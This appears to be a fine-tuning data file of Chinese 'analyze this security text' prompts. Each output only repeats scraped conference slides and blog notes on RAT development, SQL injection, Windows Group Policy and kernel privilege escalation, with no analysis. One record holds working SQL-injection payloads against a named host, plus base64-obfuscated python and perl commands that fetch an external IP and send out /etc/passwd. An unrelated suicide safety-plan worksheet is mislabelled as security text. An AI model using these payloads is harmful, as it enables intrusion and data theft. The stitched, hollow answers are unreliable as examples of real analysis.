tasks.office.com - teams.microsoft.com - asm.skype.com - msg.skype.co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 RAT Development 06/01/2022 Develop your own RAT EDR & AV Defense Dobin Rutishauser @dobinrutis https://bit.ly/3Qg219P 2 RAT Development 06/01/2022 Developer // TerreActive Pentester // Compass Security Developer // UZH SOC Analyst // Infoguard RedTeam Lead // Raiffeisen About SSL/TLS Recommendations // OWASP Switzerland Burp Sentinel - Semi Automated Web Scanner // BSides Vienna Automated WAF Testing and XSS Detection // OWASP Switzerland Barcamp Fuzzing For Worms - AFL For Network Servers // Area 41 Memory Corruption Exploits & Mitigation // BFH Berner Fachhochschule Gaining Access // OST Ostschweizer Fachhochschule 3 RAT Development 06/01/2022 Red Teaming / Scope RAT Development EDR & AV Defense Conclusion Diving into the code, 17min Background, 5min Bypass all the things, 17min What does it all mean, 6min 01 02 03 04 4 RAT Development 06/01/2022 Develop your own RAT Red Teaming 5 RAT Development 06/01/2022 Red Teaming Red Teaming realistically tests overall security posture  Not pentest!  Simulate certain types of adversaries (CTI)  Focus on TTPs (Tools, Techniques, Procedures)  Not so much focus on vulnerabilities  Credential stealing, lateral movement, data exfiltration  Testing the BlueTeam / SOC  PurpleTeaming (See talk Building a Red Team yesterday by Daniel Fabian) 6 RAT Development 06/01/2022 Client Workstation HTTP Server HTTP Proxy Antivirus EDR Sysmon SIEM/SOAR Antivirus Sandbox Domain Reputation Content Filter  No admin privileges  Theres a SOC  Internet only via authenticated HTTP proxy Target Security, Products 7 RAT Development 06/01/2022 Windows Client What is a RAT? RAT.exe Remote Access Tool Client Beacon Implant C2 https://dobin.ch Command & Control 8 RAT Development 06/01/2022 https://www.microsoftpressstore.com/articles/article.aspx?p=2992603 Killchain 9 RAT Development 06/01/2022 Everyone uses CobaltStrike Everyone detects CobaltStrike Writing a RAT yourself may solve some of your problems? Why write a RAT? 10 RAT Development 06/01/2022 Win", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNETWORK FLOW ANALYSIS DefCon 2008 Bruce Potter gdead@shmoo.com bpotter@pontetec.com Copyright 2008 - Bruce Potter INTRODUCTIONS  Bruce Potter  Founder of Ponte Technologies  Focus on advanced defensive technologies  Founder of The Shmoo Group  We run ShmooCon as well as other events  Co-author of several books and other stuff  802.11 Security  Mastering FreeBSD and OpenBSD Security  Mac OS X Security  Dont believe anything you hear in Vegas  Its mostly made up for publicity, either personal or corporate  Were not formally trained we shoot from the hip Copyright 2008 - Bruce Potter FIRST, A PLUG  No, I dont get paid for this  Well be talking a lot about data representation and visualization  This is not something to be entered into lightly theres a lot of science and theory behind data visualization  Unfortunately its hard to bring analysis and visualization concepts to the lay person in a reasonable amount of time Copyright 2008 - Bruce Potter EDWARD TUFTE  Probably best know for his slagging on PPT  Created the Gettysburg Address as a PPT amusing  Published a series of books on data representation and visualization  Visual Explanations  Envisioning Information  The Visual Display of Quantitative Information  Beautiful Evidence  Teaches 1 day classes around the country on data representation and visualization.  Again, Im not paid for any of this, but I seriously recommend you go if you can  http://www.edwardtufte.com/tufte/  Its darn near a religious experience for some Copyright 2008 - Bruce Potter IT Security Operations Software Network IT Operations Academic / Engineering LETS HAVE SOME STRUCTURE TO OUR DISCUSSION Honeypots IDS, IR & Flow Analysis Software Security & Software ACLs Firewalls & AAA Services Patch management, procedures, policy Sophistication and Operational Cost WHAT IS NETWORK ANALYSIS?  Quite simply, looking at evidence on or from the network in order to determine information regarding any of the following:  Security  Availability  Performance  C", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Insecure Workstation II Bob Reloaded When not having access qualifies as a disability Its not my fault, trust me!  The information provided in this presentation is for educational purposes only. I am in no way responsible for any damage that is the result of the use or misuse of the information provided in this presentation Todays presentation  This presentation has two parts:  Rights escalation using API call vulnerabilities  Subverting Windows logon  Key take-aways  Better understanding of simple desktop/console vulnerabilities  Protecting information assets with layered defense  Subverting desktop security for fun and entertainment! What is your opinion?  You will be asked to participate at the end of this presentation:  What methods do you use to secure your environment?  Do you follow defense in depth principles?  What would you do different? Help API vulnerability  What is a help API vulnerability? A vulnerability that is exposed when an application running with system level rights makes a API call to the help viewer and does not drop any privileges before invoking the help viewer. A user can then us the help viewer to access other application which will execute at system level.  Bugtraq report Bugtraq ID 8884 Oct 24th 2003 Brett Moore http://www.securityfocus.com/bid/8884 Help API vulnerability  How wide spread is this vulnerability?  Why do vendors continue down this path?  Money  Beat competitors to market  cutting corners  Vendors presume that users will not abuse their product  security through obscurity  Sell first, fix later  make the customer pay to fix flaws Help API vulnerability  Demonstration  Netware Zenworks remote desktop manager  Novell quickly released a security patch  Spysweeper anti spyware enterprise version  Help API fixed, but application still runs at system level and interacts with desktop  Mcafee AV 4.51  This was reported in Sep 15 2004 Bugtraq #11181  A different exploit point Help API vulnerability  How do I tell if my system i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n思科集群检索工具 [cisco-ocs主页](http://www.blackangels.it/) | [Kali cisco-ocs仓库](http://git.kali.org/gitweb/?p=packages/cisco-ocs.git;a=summary) Author: OverIP License: GPLv2 包括在cisco-ocs中的工具 cisco-ocs  思科集群检索工具 root@kali:~# cisco-ocs ********************************* OCS v 0.2 ********************************** **** **** **** coded by OverIP **** **** overip@gmail.com **** **** under GPL License **** **** **** **** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy **** **** **** **** xxx.xxx.xxx.xxx = range start IP **** **** yyy.yyy.yyy.yyy = range end IP **** **** **** ********************************************************** ******************** use: cisco-ocs IP IP cisco-ocs范例 在给定的IP范围内(192.168.99.200 192.168.99.202)搜索思科设备 root@kali:~# cisco-ocs 192.168.99.200 192.168.99.202 ********************************* OCS v 0.2 ********************************** **** **** **** coded by OverIP **** **** overip@gmail.com **** **** under GPL License **** **** **** **** usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy **** **** **** **** xxx.xxx.xxx.xxx = range start IP **** **** yyy.yyy.yyy.yyy = range end IP **** **** **** ****************************************************************************** -192.168.99.200 |Logging... 192.168.99.200 |Router not vulnerable. -192.168.99.201 |Logging... 192.168.99.201 |Router not vulnerable. -192.168.99.202 |Logging... 192.168.99.202 |Router not vulnerable.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 组策略 --- **组策略的概念** 组策略英语Group Policy是微软 Windows NT 家族操作系统的一个特性它可以控制用户帐户和计算机帐户的工作环境组策略提供了操作系统应用程序和活动目录中用户设置的集中化管理和配置组策略的其中一个版本名为本地组策略缩写LGPO或LocalGPO这可以在独立且非域的计算机上管理组策略对象 通过使用组策略你可以设置策略设置一次然后将该设置复制到多台计算机上 例如你可以在链接到域的 GPO 中设置多个 Internet Explorer11 安全设置然后将所有这些设置应用到域中的每台计算机 根据作用范围不同组策略可划分为多种并且拥有自己的执行顺序和继承原则 组策略应用顺序 - 首先应用本地组策略 - 如果有站点组策略则应用 - 接着应用域策略 - 最后应用 OU 上的策略 - 如果同一个 OU 上链接了多个 GPO则按照链接顺序从高到低逐个应用 --- ## 本地组策略 ### LGP Local Group Policy缩写 LGP 或 LocalGPO 是组策略的基础版本它面向独立且非域的计算机至少 Windows XP 家庭版中它就已经存在并且可以应用到域计算机在 Windows Vista 以前LGP 可以强制施行组策略对象到单台本地计算机但不能将策略应用到用户或组从 Windows Vista 开始LGP 允许本地组策略管理单个用户和组并允许使用GPO Packs在独立计算机之间备份导入和导出组策略组策略容器包含导入策略到目标计算机的所需文件 ## 域策略 当机器安装了域环境的时候,系统管理工具会多出一个功能(组策略管理),通过它域管理员能够很方便统一地对域内的机器和用户进行统一管理 域管理员经常会面对一个这样的问题,域成员机子的默认本地管理员密码过于简单想进行批量修改的时候这个时候就可以利用组策略来进行任务的批量下发 1.通过在域中下发脚本来执行 2.在组策略首选项 GPP 中进行设置 3.本地管理员密码解决方案:LAPS(不细说这个内容这是解决这个问题很好的方案) 首先我们需要了解下 AD 域中两个默认的共享文件夹: SYSVOL NETLOGON 可以用 net share 查看共享文件夹 ### NETLOGON NETLOGON 共享是 SYSVOL 目录中一个文件夹 Scripts 的共享名,顾名思义就是用来保存脚本信息的是 AD 活动目录安装时候自动创建的 挂载点: `SYSVOL\\domain\\SCRIPTS` --- ### SYSVOL 每台 Windows 主机有一个内置的 Administrator 账户以及相关联的密码大多数组织机构为了安全可能都会要求更改密码虽然这种方法的效果并不尽如人意标准的做法是利用组策略去批量设置工作站的本地 Administrator 密码但是这样又会出现另一个问题那就是所有的电脑都会有相同的本地 Administrator 密码也就是说如果获取了一个系统的 Administrator 认证凭据黑客就可以获取他们所有机器的管理权限 解决办法之一是为认证数据采取 SYSVOLSYSVOL 是 AD活动目录里面一个存储域公共文件服务器副本的共享文件夹所有的认证用户都可以读取SYSVOL 包括登录脚本组策略数据以及其他域控所需要的域数据这是因为 SYSVOL 能在所有域控里进行自动同步和共享 SYSVOL 在域中所有的域控制器之间复制 Sysvol 文件夹是安装 AD 时创建的它用来存放 GPOScript 等信息同时存放在 Sysvol 文件夹中的信息会复制到域中所有 DC 上 所有的域组策略存储在 `\\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\` 在域中用户登录计算机时会首先在 SYSVOL 文件查找 GPO 和启动脚本同时为了保证系统的正常运行必须为 SYSVOL 保留足够的空间缓存而且不能随意删除改动该文件夹要不然会出现一些组策略无法启用等报错信息 该目录由于针对的是域内所有机器和用户所以域内中的合法用户均可以访问和执行该目录的文件(普通的域用户也可以) --- ### GPO `gpmc.msc` 组策略对象GPOGroup Policy Object实际上就是组策略设置的集合你可以用 GPO 来存储不同的组策略信息然后作用在指定 OU 或者指定作用范围发挥作用 默认安装完 AD 之后系统默认会存在两个组策略对象 **Default Domain Policy** 默认域策略 Windows Server 2008 为林中的每个域创建一个默认域策略 GPO这个域是用于设置一些安全相关策略的主要方法如密码过期和账户锁定等 存放的路径: `C:\\Windows\\SYSVOL\\sysvol\\t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPersonal Safety Plan USE THIS PLAN WHEN IM FEELING 1. ______________________________________________ 2. ______________________________________________ 3. ______________________________________________ 4. ______________________________________________ 5. ______________________________________________ Warning Signs INTERNAL: Thoughts, mental imagery, moods, situations, behaviors that let me know a crisis may be developing: _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ EXTERNAL: Places, events, people, time of day/year, songs, themes, items, etc. that correlate with these internal signs: _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ Possible Activities Enjoyable actions to distract, relax, and refocus without contacting someone: _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ People and social settings that provide distraction: _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ _____________________________ Action Plan 1. Take a deep breath 2. Ask for suicidal thoughts to be removed from my brain 3. HALT (hungry | angry | lonely | tired) 4. Take 5 more deep, slow breaths & zone in to the present 5. Identify my current feelings 6. Practice feelings vs. facts 7. Write down feelings for later review 8. Do in spite of how I feel 9. Choose an activi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<?php /* Stop hackers. */ if(!defined('FROM_INDEX')) die(); define('MAX_IM_SIZE', 32); function create_image_key() { return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand()); } function save_image($im, $imagekey) { if(1 !== preg_match('/[0-9a-f]{40}/', $imagekey)) { fatal('Invalid image key.'); } if(!imagepng($im, \"uploads/{$imagekey}.png\")) { fatal('Failed to save image.'); } } function load_image($imagekey) { if(1 !== preg_match('/[0-9a-f]{40}/', $imagekey)) { fatal('Invalid image key.'); } $im = imagecreatefrompng(\"uploads/{$imagekey}.png\"); if(!$im) { fatal('Failed to load image.'); } return $im; } ?>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 NYCMIKE NYCMIKE The World of Pager Sniffing The World of Pager Sniffing and Interception: and Interception: More Activity than one may More Activity than one may suspect. suspect. + = Music: The Cools Kids  Gold and a Pager The idea is the let the music play while folks enter the room then move on to the next slide. (Point out the obvious) Pager interception was once well documented and wildly done within certain groups. Therefore Im no trailblazer or am I? Old tech is not bad tech, its dated, Its documented, but still useable and interesting. The idea is to re- introduced the activity with some ideas that may of not been available in the early to mid 90s. I want to stress again that OLD TECH IS NOT BAD TECHif anything its tried and tested. *note* I probably should of removed or just covered up the text in that screen capture What do you see when you read it. 2 NYCMIKE NYCMIKE -- Do not go where the path may lead, go Do not go where the path may lead, go instead where there is no path and leave instead where there is no path and leave a trail. a trail. - Ralph Waldo Emerson - Ralph Waldo Emerson -- Everything that was or ever is began with Everything that was or ever is began with a dream. a dream. - Lava Girl - Lava Girl Quote (1) : Pager interception has been done, therefore the path has been made so how does this relate? Things evolve over time this is no exception so I encourage all to find the new path. The challenge to reinvent, rethink, and retool is open to all amateur SIGINT (radio monitoring) is a blast (expensive) join the ranks and help the hobby. Quote (2) : Dont be afraid to think outside of the box. Try your concepts sometime things just work. 3 NYCMIKE NYCMIKE Who is this guy? Who is this guy?  Nicks: Nicks: Steve from Idaho, Snuffalupugus, NYCMIKE and Dr. Love and Steve from Idaho, Snuffalupugus, NYCMIKE and Dr. Love and a few others. a few others.  Work History: Work History: Busboy at a local banquet hall, Gas station clerk (slurpe tech), Busboy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game Joshua Drake, Zimperium Steve Christey Coley, MITRE DEF CON 24 Aug 7, 2016 Introductions  About Josh  20-years of VR, Ran iDefense VCP  About Steve  CVE co-founder, Responsible Disclosure (sorry), CVSS, CWE, ...  Why we are doing this  Currently, there is *way* more insecure code out there than researchers. This isn't guaranteed in 10 years, though.  We need more people looking at code thats deployed in the real world  What we hope to accomplish by doing this  Encourage more people to get involved Disclaimers  This is our opinion only  Based on our own career experiences  Others have their own opinions  YOU proving the cliche are a unique snowflake  Youll find your own way, but hopefully we can help you find it faster  No new sploits here What is a Vulnerability?  Too many definitions  Roughly: a mistake in softwares design or implementation that allows an attacker to conduct activities that (1) affect other users and (2) are not explicitly allowed or intended by the developer or sysadmin.  What do you have? vs. What do you get? - there must be a difference  How much help must the victim give you? (user interaction)  Automatic  Normal usage (e.g., clicking on a link is *normal*)  Was victim stupid/clueless? (just copy this javascript: url into browser)  How much luck do you need? ASLR, unusual configs, narrow race windows What is a Vulnerability? (2) Vulnerabilities != Exploits (awesome @SwiftOnSecurity tweet) A Vulnerability resides in the software itself, doing nothing on its own An Exploit is a set of steps (possibly manual, or in the form of a program) that interacts with the software in a way that has a non-zero chance of successfully taking advantage of a vulnerability What is Vulnerability Research?  The process of analyzing a product, protocol, or algorithm in order to find unintended behaviors that allow an attacker to gain additional access to functionality or data that has not ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFOR THE LOVE OF MONEY Finding and exploiting vulnerabilities in mobile point of sales systems LEIGH-ANNE GALLOWAY & TIM YUNUSOV MPOS GROWTH 2010 Single vendor 2018 Four leading vendors shipping thousands of units per day Motivations Motivations MWR Labs Mission mPOSsible 2014 Related Work Mellen, Moore and Losev Mobile Point of Scam: Attacking the Square Reader (2015) Related Work Research Scope Research Scope PAY PA L S Q U A R E I Z E T T L E S U M U P Research Scope How much security can really be embedded in a device that is free? Research Scope PHONE/SERVER HARDWARE DEVICE/PHONE MOBILE APP SECONDARY FACTORS Research Scope MERCHANT ACQUIRER CARD BRANDS ISSUER Background MPOS PROVIDER ACQUIRER CARD BRANDS ISSUER MERCHANT MERCHANT Background CARD RISK BY OPERATION TYPE Chip & PIN Chip & Signature Contactless Swiped PAN Key Entry Background EMV enabled POS devices make up between 90-95% of POS population E U E M V AC C E P TA N C E EMV enabled POS devices make up 13% of POS population and 9% of the ATM population 90% 13% U S E M V AC C E P TA N C E GLOBAL ADOPTION OF EMV - POS TERMINALS Background 96% of credit cards in circulation support EMV as a protocol E M V C R E D I T C AR D AD O P T I O N However less than half of all transactions are made by chip E M V C R E D I T C AR D U S AG E 96% 41% Background 79% of debit cards in circulation support EMV as a protocol E M V D E B I T C AR D AD O P T I O N However less than half of all transactions are made using chip E M V D E B I T C AR D U S AG E 79% 23% Background 46% 52 MILLIO N PERCENTAGE OF TRANSACTIONS MILLIONS OF NUMBER OF UNITS MPOS TIMELINE 2019 Background 46% 52 SCHEMATIC OVERVIEW OF COMPONENTS Background FINDINGS SENDING ARBITRARY COMMANDS AMOUNT MODIFICATION REMOTE CODE EXECUTION HARDWARE OBSERVATIONS SECONDARY FACTORS Methods & Tools BLUETOOTH Methods & Tools Host Controller Interface (HCI) SOFTWARE BT PROFILES, GATT/ATT L2CAP LINK MANAGER PROTOCOL (LMP) BASEBAND BLUETOOTH RADIO HOST CONTROLLER BLUETOOT", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n在看极客巅峰2020的wp里babyback的题wp提到了单引号被过滤使用\\代替由于当时没做出来 看了一下挺好奇查看了一下文章做个总结使用\\代替单引号的一半只适用于下面的这种情况 类似 (Login_Only_For_36D的题) 这里的题目源码https://github.com/y1nglamore/Y1ngCTF/blob/master/36D_Login_Only_For_36D/src/index.php 分析了一下代码之所以用\\在$uname处逃逸是因为单引号被过滤了绕过在uname处做过滤点造成无法闭合单引号的问题如果用\\逃逸单引号将变成如下的sql 从上面的题目代码修改了一下然后练习一波 单引号逃逸后拼接完如下可以成功注入 然后可以构造语句进行注入了 这里因为select和substr那些被过滤了如果要猜对应的东西需要这么干原wp给出的语句 利用regxp和binary进行猜解 参考链接:https://www.gem-love.com/ctf/2283.html BINARY和VARBINARY与 CHAR和VARCHAR类型有点类似不同的是BINARY和VARBINARY存储的是二进制的字符串而非字符型字符串也就是说BINARY和VARBINARY没有字符集的概念对其排序和 比较都是按照二进制值进行对比 regxp则是正则匹配 Evernote Export file:///C:/Users/JiuShi/Desktop/mysql注入单引号被过滤... 第1页 共1页 2020/10/8 22:30", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### PWN关于Change Self概述 内核会通过进程的 `task_struct` 结构体中的 cred 指针来索引 cred 结构体然后根据 cred 的内容来判断一个进程拥有的权限如果 cred 结构体成员中的 uid-fsgid 都为 0那一般就会认为进程具有 root 权限 ```c struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ ... } ``` 因此思路就比较直观了我们可以通过以下方式来提权 - 直接修改 cred 结构体的内容 - 修改 task_struct 结构体中的 cred 指针指向一个满足要求的 cred 无论是哪一种方法一般都分为两步定位修改这就好比把大象放到冰箱里一样 ### Change Self基于直接改 cred方法的定位方式 我们可以首先获取到 cred 的具体地址然后修改 cred #### 定位 定位 cred 的具体地址有很多种方法这里根据是否直接定位分为以下两种 ##### 直接定位 cred 结构体的最前面记录了各种 id 信息对于一个普通的进程而言uid-fsgid 都是执行进程的用户的身份因此我们可以通过扫描内存来定位 cred ```c struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ ... } ``` **在实际定位的过程中我们可能会发现很多满足要求的 cred这主要是因为 cred 结构体可能会被拷贝释放**一个很直观的想法是在定位的过程中利用 usage 不为 0 来筛除掉一些 cred但仍然会发现一些 usage 为 0 的 cred这是因为 cred 从 usage 为 0 到释放有一定的时间此外cred 是使用 rcu 延迟释放的 ##### 间接定位 ###### task_struct 进程的 `task_struct` 结构体中会存放指向 cred 的指针因此我们可以 1. 定位当前进程 `task_struct` 结构体的地址 2. 根据 cred 指针相对于 task_struct 结构体的偏移计算得出 `cred` 指针存储的地址 3. 获取 `cred` 具体的地址 ###### comm comm 用来标记可执行文件的名字位于进程的 `task_struct` 结构体中我们可以发现 co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSQLBYPASS sql,fuzzpoc bjfytzs.aliyuncs.com/vul_poc_query?uuid=68dde649-bc6c-4c9e-8e4c- cb410977a53e&poc=hello_world'||' , fuzzfrom, ,ip ,ua+cookie,payload poc_data bjfytzs.aliyuncs.com/vul_poc_query?uuid=68dde649-bc6c-4c9e-8e4c- cb410977a53e&poc=hello_world'%27%26%26IFNULL(ascii(substring((select{x%2 0table_name}from%20`information_schema`.tables%20where%20table_schema=da tabase%23%0A()%20limit%200,1),1,1))%3E1,%27f%27)||%27 payload hexascii, bjfytzs.aliyuncs.com/vul_poc_query?uuid=68dde649-bc6c-4c9e-8e4c- cb410977a53e;poc=hello_world%27%26%26IFNULL(substring((select{x%20column _name}from`information_schema`.columns%20where%20table_name=%27poc_data% 27%20limit%201,1),9,1)%20regexp%20%27d%27,%27F%27)||%27 poc=hello_world'%26%26IFNULL(hex(substring((select{x}from`poc_data` limit 1,1),{l},1)) = '{data}','F')||' %23%0a.%23%0a.tables information_schema%23%0a.%23%0a.tables like RCE RCExff,dns http,encode rce,fuzzsh /bin/sh , pythonperl ;`python -c 'import os,base64;os.system(base64.b64decode(\"d2dldCBodHRwOi8vMTE2LjYyLjIwMC4xND MvP2E9YGNhdCAvZXRjL3Bhc3N3ZGA=\"))'` perl POST /vul_poc_query?uuid=9b99dd44-c240-45a8-b5f2- ad4682aca741&poc=hello_world HTTP/1.1 Host: bjfytzs.aliyuncs.com User-Agent: Mozilla/5.0 (Windows NT 8.1; rv:113.70) (KHTML, like Gecko) AppleWebKit/84.70 Chrome/113.70; Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en- US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 X-Forwarded-for: 100.127.194.98;`perl -e 'use MIME::Base64;readpipe(decode_base64(\"d2dldCAxMTYuNjIuMjAwLjE0My8/YT1gY2F 0IC9ldGMvcGFzc3dkYA==\"))'` Content-Length: 26 Origin: https://bjfytzs.aliyuncs.com Connection: close Referer: https://bjfytzs.aliyuncs.com/ Cookie: tzs_finger_print=82f09d64ffde96e6d261b0791850ef84; sessionid=2hm6uvygcnubvqy1i2b1zmu6wdiqs5ok; tzs_ip=100.127.194.98; tzs_req_code=416a2f926cbd345cfdc485f90bf059f3d855c9c54414df45243b6f166c5 38490561f809235d09dbe9a77f1c32e6f9302 Sec-Fetch-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1059-004-linux-脚本 ## 来自ATT&CK的描述 攻击者可能会滥用Unix shell命令和脚本来执行Unix shell是Linux和macOS系统上的主要命令提示符尽管Unix shell存在许多变体例如shbashzsh等具体取决于特定的OS或发行版Unix shell可以使用某些要求提升特权的命令来控制系统的各个方面 Unix shell还支持脚本这些脚本支持顺序执行命令以及其他典型的编程操作例如条件和循环Shell脚本的常见用法包括冗长或重复的任务或者需要在多个系统上运行同一组命令 攻击者可能会滥用Unix shell来执行各种命令或有效载荷可以通过命令和控制通道或在横向移动期间例如使用SSH访问交互式外壳攻击者还可以利用Shell脚本在受害者上传递或执行多个命令或者作为用于持久性的有效载荷的一部分 ## 测试案例 如何在linux下进行模拟和测试我们可以创建一个简单bash脚本并执行它观察它在日志中留下的痕迹 ## 检测日志 linux audit日志 值得注意的是Ubuntu默认情况下没有audit需要下载安装并配置相关策略 ## 测试复现 icbc@icbc:/hacker$ bash 1.bash ## 测试留痕 icbc@icbc:/$ cat /var/log/audit/audit.log type=SYSCALL msg=audit(1565352677.388:1524): arch=c000003e syscall=59 success=yes exit=0 a0=564608ddc330 a1=564608dbd8c0 a2=564608de3970 a3=8 items=2 ppid=2095 pid=2807 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=4 comm=\"bash\" exe=\"/usr/bin/bash\" key=\"auditcmd\" type=EXECVE msg=audit(1565352677.388:1524): argc=2 a0=\"bash\" a1=\"1.bash\" type=CWD msg=audit(1565352677.388:1524): cwd=\"/hacker\" type=PATH msg=audit(1565352677.388:1524): item=0 name=\"/usr/bin/bash\" inode=2228277 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 ## 检测规则/思路 ### splunk规则 index = linux sourcetype = linux_audit syscall = 59 | table hostsyscallsyscall_nameexeauid ### 建议 值得注意的是我们只是把环境中的脚本执行行为记录下来如果没有设置白名单那么我们需要消耗大量的精力用于处理误报 ## 参考推荐 MITRE-ATT&CK-T1059-004 <https://attack.mitre.org/techniques/T1059/004/> Audit配置手册 <https://www.cnblogs.com/bldly1989/p/7204358.html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzzing for Software Security Testing and Quality Assurance For a list of related Artech House titles, please turn to the back of this book. Fuzzing for Software Security Testing and Quality Assurance Ari Takanen Jared DeMott Charlie Miller artechhouse.com Library of Congress Cataloging-in-Publication Data A catalog record for this book is available from the U.S. Library of Congress. British Library Cataloguing in Publication Data A catalogue record for this book is available from the British Library. ISBN 13: 978-1-59693-214-2 Cover design by Igor Valdman  2008 ARTECH HOUSE, INC. 685 Canton Street Norwood, MA 02062 All rights reserved. Printed and bound in the United States of America. No part of this book may be reproduced or utilized in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage and retrieval system, without permission in writing from the publisher. All terms mentioned in this book that are known to be trademarks or service marks have been appropriately capitalized. Artech House cannot attest to the accuracy of this information. Use of a term in this book should not be regarded as affecting the validity of any trademark or service mark. 10 9 8 7 6 5 4 3 2 1 This book is dedicated to our families and friends . . . . . . and also to all quality assurance specialists and security experts who are willing to share their knowledge and expertise to enable others to learn and improve their skills. Contents Foreword xv Preface xix Acknowledgments xxi CHAPTER 1 Introduction 1 1.1 Software Security 2 1.1.1 Security Incident 4 1.1.2 Disclosure Processes 5 1.1.3 Attack Surfaces and Attack Vectors 6 1.1.4 Reasons Behind Security Mistakes 9 1.1.5 Proactive Security 10 1.1.6 Security Requirements 12 1.2 Software Quality 13 1.2.1 Cost-Benefit of Quality 14 1.2.2 Target of Test 16 1.2.3 Testing Purposes 17 1.2.4 Structural Testing 19 1.2.5 Functional Testing 21 1.2.6 Code Auditing 21 1.3 Fuzzing 22 1.3.1 Bri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n08.10.2014 ANDROID HACKER PROTECTION LEVEL 0 TIM DIFF STRAZZERE - JON JUSTIN CASE SAWYER Defcon 22 + some blackphone stuff  CTO of Applied Cybersecurity LLC  Professional Exploit Troll  Has big mouth  @TeamAndIRC  github.com/CunningLogic !  Research & Response Engineer @ Lookout  Obfuscation Junkie  Pretends to know as much as JCase  @timstrazz  github.com/strazzere WHO ARE WE JCASE DIFF More importantly - why should you care? WHY ARE WE HERE  Obfuscation is magical !  Quantifying the challenge is hard, mainly marketing material in Google results  Good devs use it  Interesting devs use it  Bad devs use it  Understanding apps is hard, lets classify everything as bad and just blog! So good, even malware authors use us! WHAT IS OUT THERE  Then -  Dex Education 101 - Blackhat 2012  Anti-decompilation tricks  Anti-analysis tricks  Demo/Release POC packer  General Optimizers / Minimal Obfuscators  A little bit after  Integration of tricks, release of specific tools  One off tools targeting environments/toolsets  Now -  Most anti-decompilation/analysis tricks fixed in mainstream tools (baksmali, dex2jar, IDA Pro, radar)  Main stream commercial packers, protectors and obfuscates So - UPX and other stupid stuff? PACKERS, PROTECTORS?  Optimizers / Obfuscators  Good practice for devs  Removes dead code / debug code  Potentially encrypt / obfuscate / hide via reflection public!void!onClick(DialogInterface!arg7,!int!arg8)!{! ! try!{! ! ! Class.forName(\"java.lang.System\").getMethod(\"exit\",!Integer.TYPE).invoke(null,!Integer.valueOf(0));! ! ! return;! ! }!catch:(Throwable!throwable)!{! ! ! throw!throwable.getCause();! ! }! } public!void!onClick(DialogInterface!arg7,!int!arg8)!{! ! try!{! ! ! 